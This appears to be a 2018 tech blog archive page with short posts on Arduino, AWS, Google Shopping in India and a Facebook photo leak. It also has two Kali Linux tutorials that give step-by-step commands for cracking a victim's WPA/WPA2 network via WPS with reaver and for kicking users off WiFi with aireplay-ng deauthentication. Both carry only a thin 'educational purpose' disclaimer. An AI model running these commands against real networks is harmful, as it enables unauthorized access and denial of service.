Posts

Showing posts from December, 2018

WPA - WPA2 WiFi Hacking With Kali linux

Image
  WPA - WPA2 WiFi Hacking With Kali Linux                                          Warning: This tutorial is for educational purpose only. We are not responsible for your consequences.   Open terminal  1-  #airmon-ng check kill   2- #airmon-ng check   3- #airmon-ng start wlan0 4- #airodump-ng  wlan0mon   Open new terminal and open reaver tool by typing: # reaver -i wlan0mon -b <victim'sBSSID> -vv -K  <victim'sCH> 

Arduino

Image
What is Arduino? Arduino is an open-source electronics platform based on easy-to-use hardware and software.  Arduino boards  are able to read inputs - light on a sensor, a finger on a button, or a Twitter message - and turn it into an output - activating a motor, turning on an LED, publishing something online. You can tell your board what to do by sending a set of instructions to the microcontroller on the board. To do so you use the  Arduino programming language  (based on  Wiring ), and  the Arduino Software (IDE) , based on  Processing . Over the years Arduino has been the brain of thousands of projects, from everyday objects to complex scientific instruments. A worldwide community of makers - students, hobbyists, artists, programmers, and professionals - has gathered around this open-source platform, their contributions have added up to an incredible amount of  accessible knowledge  that can be of great help to novices and experts...

AWS - Amazon Web Services

Image
A mazon Web Services  ( AWS ) is a subsidiary of  Amazon.com  that provides  on-demand   cloud computing   platforms  to individuals, companies and governments, on a paid subscription basis. The technology allows subscribers to have at their disposal a  virtual   cluster of computers , available all the time, through the Internet. AWS's version of virtual computers emulate most of the attributes of a real computer including hardware (CPU(s) & GPU(s) for processing, local/RAM memory, hard-disk/SSD storage); a choice of operating systems; networking; and pre-loaded application software such as  web servers ,  databases ,  CRM , etc. Each AWS system also virtualizes its  console  I/O (keyboard, display, and mouse), allowing AWS subscribers to connect to their AWS system using a modern  browser . The browser acts as a window into the virtual computer, letting subscribers  log-in ,  configure ...

HOW TO KICK OUT SOMEONE FROM THE WIFI USING KALI LINUX

Image
WARNING This tutorial is for educational purpose only. We are not responsible for your consequences. 1- Open  terminal  and type: airmon-ng check kill airmon-ng start <your_interface> It will start monitor mode. To check your network interface type: airmon-ng wlan0  is my network interface and  wlan0mon  is my monitor mode interface . 2- To see available networks type: airodump-ng <moniter_mode_interface> 3- To refine your available networks type: airodump-ng -c <channel> –bssid <bssid> <moniter_mode_interface> 4- Now to disconnect any connection type: aireplay-ng -0 0 -a  <your_bssid>  -c <victim’s_bssid> <monitor_mode_interface> It will start sending De-authentication to the connection and disconnect it. Send the number of Deauths to the selected BSSID to keep on disconnecting them from the wifi The wifi will be reconnected after the sending of Deauths has b...

Google Shopping Launched in India

Image
Wherever you go, I am there; says Google. Yeah, with the launch of Google Shopping in India, we are forced to say it. The  search engine titan  has got their hands on everything online.  Google Shopping , the inventory of products you can purchase just started waves in India. We have been hearing about Google Shopping, coming to India. Now that it happened, you have to get accustomed with the same to pull off the maximum possibilities of  online shopping . Let’s delve into what Google Shopping does. Google Shopping Website Went Live in India You might have used  many services from Google . We don’t want to name each of them. The point is, you can add one more to the list. Google Shopping, the shopping directory website from the Mountain View titan has finally gone live in India. You might have already got a simple answer to the question, what actually is Google Shopping? It is an inventory of products that Google thinks relevant to you. Don’t tell me...

Facebook Data Leak Reportedly Allowed Access to Photos of 6.8 Million Users

Image
It looks like  Facebook  is not having the best of times this year and it just got even worse. There is yet another data leak to add to Facebook's tally of data leaks this year. This time around, Facebook has come out in open and told everyone about this data leak themselves. As far as the latest data leak is concerned, Facebook found out a bug in its Photo API. This bug would allow  applications to access photos  of users that were not posted on their timeline. The social media giant has estimated that this Photo API bug gave access to nearly 6.8 million photos of their users.                      Silicon Valley giant, Facebook, allows third-party applications to use Facebook login with their  Photo API . Also, this Photo API allows third-party apps to get access to Facebook users' photos. Keep in mind that a user has to allow access to their photos insid...